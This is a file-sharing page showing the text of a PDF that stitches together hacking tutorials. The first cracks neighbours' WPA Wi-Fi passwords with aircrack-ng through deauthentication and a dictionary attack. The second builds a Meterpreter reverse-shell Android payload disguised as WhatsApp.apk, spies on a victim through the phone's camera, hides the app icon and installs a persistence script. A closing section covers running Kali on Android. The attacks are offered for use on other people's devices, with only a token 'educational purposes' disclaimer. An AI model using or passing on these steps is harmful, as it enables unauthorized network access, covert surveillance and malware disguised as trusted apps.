Hack Wifi Password Kali Linux Android

Hack Wifi Password Kali Linux Android

hack wifi password kali linux android How To – hack Wifi password with Kali linux (ANDROID) Hello guys, Now a days, everyone wants to know how to hack wifi passwords in order to gain access to nearest protected wifi networks. There are simple methods which can help you hack a wifi password but they do not help you hack each and every wifi networks. If you use WPS WPA TESTER app to hack a wifi password then it only allows you to hack only some wifi networks. Wpsin has the same problem. Hence today i am going to tell you the method to hack any wifi password with your android. For this your android device must be rooted. HOW TO HACK ANY WIFI PASSWORD WITH YOUR ANDROID. So fellas, here i am telling you the method to hack any wifi password with your android. The tool we will use in this process is KALI LINUX . We will use Kali linux here to hack wifi passwords. Your requirements:- Kali linux or any linux system installed on your device with aircrack-ng suite installed. If you do not have aircrack-ng suite inatalled the get it by entering this command in terminalsudo apt-get install aircrack-ng. You should have a wire less network adapter that must support monitor mode like. a- Alfa 2W AWUS036NH b- Alfa AWUS036H c- wifiy-city 56G. 3- a word list comprising of all the possible different combination of pass-phrases. NOW THE METHOD OF CRACKING THE PASSWORD STARTS:- I am using wifiy-city56G card on Kali linux sana. Open your terminals and write ifconfig. this will display you all the networking interfaces that are connected to your device. If your wireless network adapter is working fine you should see the ” wlan0 ” the name may change if you have more then one connected wireless adapter. To start monitor mode type – airmon-ng start wlan0. After giving this command we started the monitor mode. as we know that the monitor mode is working under wlan0mon , so this is your card name for now in the red area a list of process id’s that cause trouble during the process so kill those processes by typing- ” Kill ” Here i will type- kill765 986 1090 1201 1081. Now type ifconfig and this will display the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 . to show list of available WiFi network type. >> airodump-ng will start capturing all packets and from the captured packets. Select your target and note its ‘bssid’ (bssid = base service set identifier) and channel then stop the capture using “Ctrl +c“. Start capturing the packets of your victim wifi network by typing. airodump-ng -c -w –bssid wlan0mon. In the bssid field type the bssid you noted in above step. this will start the capturing of packets. >>and if you get the handshake you wont need the aireplay command… if you don’t get the handshake yet while the capturing of packets goes on, open a new terminal as root and type— aireplay-ng -0 0 -a mon0. aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon. after few seconds stop it using Ctrl+c. now after we have successful captured the wpa handshake. 5) Stop the capturing using cntrl +c and type “ls” that would bring up all the current directories and files. Select the file with “.cap“extension and type the following command. In my case – aircrack-ng -w /usr/share/ wordlists/more_than_8.txt ********-01.cap. For the Wordlist Check this Post Best Password dictionary Now it starts finding suitable passphrase. and now all you have to do is wait till you see the lovely news ( KEY Found ( your key is here ). Yahooo you have hacked the wifi nerwork. So guys here is the method to hack wifi network. Do not misuse this post. This post is just for educational purposes. If you like this post, please share with your friends… MUST WATCH THIS VIDEO ABOUT HOW YOU CAN CREATE VIRUS WITH ANDROID. How To Hack Android Phone Remotely Using Kali Linux. Those who visit our site, already know how to hack android phone remotely using Spynote RAT. If you doesn’t know about this go to below link to learn it because it’s very easy. In this tutorial, we will learn how to hack android phone remotely using kali linux make it persistent. But now, we will use Metasploit framework in Kali Linux to hack and compromise the android device. So, without wasting too much time let’s start. How To Hack Android Phone Remotely. Step 1- Open terminal in Kali Linux. Type ifconfig and note down your ip address. If your victim is in the same network in which you are, you need to use this ip address as lhost while creating payload and setting up listener. If your victim is on the internet, you need to do port forwarding for this using your router. If you do not have a router and wants to make port forwarding task very easy using portmap.io, read this. Step 2- First, we will create our payload to deliver to android device, so use below command and press enter. msfvenom -p android/meterpreter/reverse_tcp lhost=your_ip lport=your_port -o /root/Desktop/WhatsApp.apk. It will create a new payload in apk format on desktop with name WhatsApp. You need to use your ip address in lhost and your port in lport. If you are using portmap.io site for port forwarding use port number given by portmap.io site in lport field. Step 3- Now we need to deliver and install payload apk file in our victim’s phone and setup a listener in msfconsole. So, open terminal use these commands step by step. msfconsole. use exploit/multi/handler. set PAYLOAD android/meterpreter/reverse_tcp. set LHOST ip_address_that_you_used. set LPORT port. exploit. Replace port with the port number in your system that you forwarded in your system or on portmap.io site. Step 4- All we need to do now, is wait for the victim to our app. As soon as, our victim opens the app, we will get meterpreter session in our console. Use help command and press to get list of all the commands. Use webcam_snap command to capture photos from camera. Use hide_app_icon command to hide icon of our payload app from menu. Make Our Payload Persistence. Ohkay! Now we have another problem. Whenever our victim stops our payload from running we need to again start the payload in order to receive the connection. But luckily we have a solution for this problem. We will create an autostart script and deploy it in storage of victim’s phone, just after we get meterpreter session. First, we need to create our script. So, open notepad and type following code in it. #!/bin/bash. while : do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity. sleep 20. done. Save this notepad file as autostart.sh , you can use any name but you need to use .sh at the end of file name as file extension. Save it on Desktop. Now, just after getting the meterpreter session, we need to upload this script to victim’s phone and execute it. So, follow my instructions. upload /root/Desktop/autostart.sh /sdcard/ Our file has been uploaded to victim’s smart phone. It’s time to execute it. We will do this using shell and commands in meterpreter session. shell. It will drop a shell in system. We need to go to sdcard to execute script. After navigating to sdcard, use ls command to check if your script is there or not. Execute script using below command. sh autostart.sh. There’s a limitation of this persistence method, it will work only until the victim reboot their phone. You can make it work even after reboot, but victim’s smartphone must be rooted for this. So assuming that victim’s smartphone is rooted, let’s make our payload persistence even after reboot. Use these commands step by step to do this. cd / cd /etc/init.d/ upload autostart.sh. sh autostart.sh. In short, we need to upload the script in /etc/init.d/ folder which is available in root directory and then execute our script. Our two tutorials about how to hack android phone remotely are completed. More are coming, using this kali linux method you can get some more control over compromised phone. Turn Android into Hacking Machine using Kali Linux without Root. Your Android phone can turn into a hacking device with just a few steps, having the ability to run tools like Nmap, Nikto, Netcat, and more without rooting the device. This article will teach you how you can run a hacking operating system on your Android phone by using an application UserLAnd. This app is developed by UserLAnd Technologies to install Linux distributions on Android phones without any rooting. The app is available on the play store and is completely free. This application makes it possible to run the ARM64 Debian operating system with the current Android OS. The ARM architecture is the same used by the Kali Linux Raspberry Pi ARM images, which makes it easy to import Kali’s tool repository. Moreover, UserLAnd developers added a feature i.e. a dedicated Kali filesystem to import all necessaries repositories easily. Still, we can not neglect the fact that UserLAnd is not an old project, and it might be possible that some tools like Nmap would break while executing several commands.

View Full Text

Details

  • File Type
    pdf
  • Upload Time
    -
  • Content Languages
    English
  • Upload User
    Anonymous/Not logged-in
  • File Pages
    8 Page
  • File Size
    -

Download

Channel Download Status
Express Download Enable

Copyright

We respect the copyrights and intellectual property rights of all users. All uploaded documents are either original works of the uploader or authorized works of the rightful owners.

  • Not to be reproduced or distributed without explicit permission.
  • Not used for commercial purposes outside of approved use cases.
  • Not used to infringe on the rights of the original creators.
  • If you believe any content infringes your copyright, please contact us immediately.

Support

For help with questions, suggestions, or problems, please contact us